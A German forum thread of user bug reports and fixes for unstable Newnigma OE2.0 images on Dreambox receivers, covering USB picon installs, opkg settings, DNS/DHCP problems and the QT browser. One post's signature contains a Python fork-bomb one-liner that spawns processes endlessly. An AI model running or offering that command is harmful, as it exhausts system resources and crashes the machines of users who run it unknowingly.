Feedback/Bugs in unstable images DM8000/DM7020HD/DM800se/DM800/DM500HD OE2.0

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Original von sparksofinsanity
    Naja USB-Laufwerk über "Menü > Einstellungen > System > Speichergeräte" initialisieren und anschließend mounten > E2 neu starten und anschließend auf USB installieren ..


    Das Problem ist, daß wenn ich die Picons auf USB installieren will dieses nicht zur Auswahl steht. Obwohl ich den USB Stick wie beschrieben gemounted habe.
  • Naja USB-Laufwerk über "Menü > Einstellungen > System > Speichergeräte" initialisieren und anschließend mounten"
    "blaue Taste > Newnigma Services > System Werkzeuge > Experten Einstellungen > Opkg ignoriere USB/HDD = nein > E2 Neustart und anschließend auf USB installieren"
  • Original von sparksofinsanity
    "blaue Taste > Newnigma Services > System Werkzeuge > Experten Einstellungen > Opkg ignoriere USB/HDD = nein > E2 Neustart"


    Genau das war´s.
    Vielen Dank, Sparks - Super!
    Und ne Swap-Datei kann man im Moment nicht anlegen, oder?
  • Was versteht ihr unter kein support?
    Hier wird wieder alles durchgekaut also entweder support oder keinen!!!!!
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Hi,
    sorry net gesehen das es schon ein Thread gibt, funzt nun auch, Netzwerkprobs sind wohl im OE2 vorprogrammiert!! 8o
    Darum ging es ---> NN²alpha5 Online Feed!! :(
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von goetzy200 ()

  • Hallo, sämtliche Plugins außer die Enigma eigenen scheinen keinen Zugriff auf das Internet zu haben, TV Charts kann die Daten nicht downloaden, und das Seriesplugin auch nicht. Jemand eine Idee?
  • Auf meiner 800SE kann ich gar keine Erweiterungen runterladen. Erhalte immer die Meldung "Softwaremanagement Plugin ist nicht installiert! Bitte instaliieren sie es".
    Woran liegt das?

    edit: Sehe grad, dass man über die Newnigma Services dort hinkommt.
    mfg

    Jojo

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Jojojoxx ()

  • Original von Matty06
    Hallo, sämtliche Plugins außer die Enigma eigenen scheinen keinen Zugriff auf das Internet zu haben, TV Charts kann die Daten nicht downloaden, und das Seriesplugin auch nicht. Jemand eine Idee?


    bei den OE2 Images gab/gibt es noch dns probleme.
    sollten eigentlich behoben sein.

    Wenn man aber in den netzwerksettings DHCP Aktiviert geht der download.
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • QT-Browser ?

    Ist der QT-Browser beim 7020HD-Image dabei?

    Der Web-Browser von DMM scheint mir unbrauchbar zu sein.

    Falls nicht dabei:
    gibt es ipkg für den QT-Browser und sind die für OE 1.6 oder 2.0 ?
    Gruß Èowyn
  • RE: QT-Browser ?

    Original von Èowyn
    Ist der QT-Browser beim 7020HD-Image dabei?

    Der Web-Browser von DMM scheint mir unbrauchbar zu sein.

    Falls nicht dabei:
    gibt es ipkg für den QT-Browser und sind die für OE 1.6 oder 2.0 ?


    Der QT Browser ist nicht dabei. Ob es ein ipk für den QT Browser gibt, ist mir nicht bekannt.
  • So erstmal bedient gehe wieder auf NN² 3.3.2 zurück!!! :(
    Nicht das Internet macht wahnsinnig, sondern die Wahnsinnigen machen das Internet!!
    Gruß goetzy200!! :denk:

    DM7020HDss, DM800sec, DM500HD-s, Tastatur Logitech K400r, iMac 21.5, MacBook, Lappi Debian Squeeze, iPhone 5, iPadmini, iPad3, PS3, Sat 13+19.2, Buffalo NAS 1TB


  • @jojojoxxx
    ja sind update fähig.


    @goetzy200
    es läuft doch alles. wenn netzwerk nicht geht, einfach dhcp einschalten.
    Probleme kann man niemals mit derselben Denkweise lösen.

    ¯\_(ツ)_/¯

    "Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
    Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."
  • RE: QT-Browser ?

    Original von Èowyn

    Der Web-Browser von DMM scheint mir unbrauchbar zu sein.



    komisch der dmm browser ist der von qt, weshalb ist der unbrauchbar ?
    » time to say goodbye «

    Konfuzius sagt:
    Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
  • RE: QT-Browser ?

    Original von nixkoenner
    komisch der dmm browser ist der von qt, weshalb ist der unbrauchbar ?

    Im GP 3.2 war anfangs der QT-Browser im Blue-Panel und der DMM-Browser im Menü.

    Mir ist es völlig gleichgültig, worauf der DMM-Browser beruht - er funktioniert nicht!

    Der "echte" QT-Browser ist für mich nach meiner kurzen "Fremdgeh-Erfahrung" unverzichtbar geworden.
    Gruß Èowyn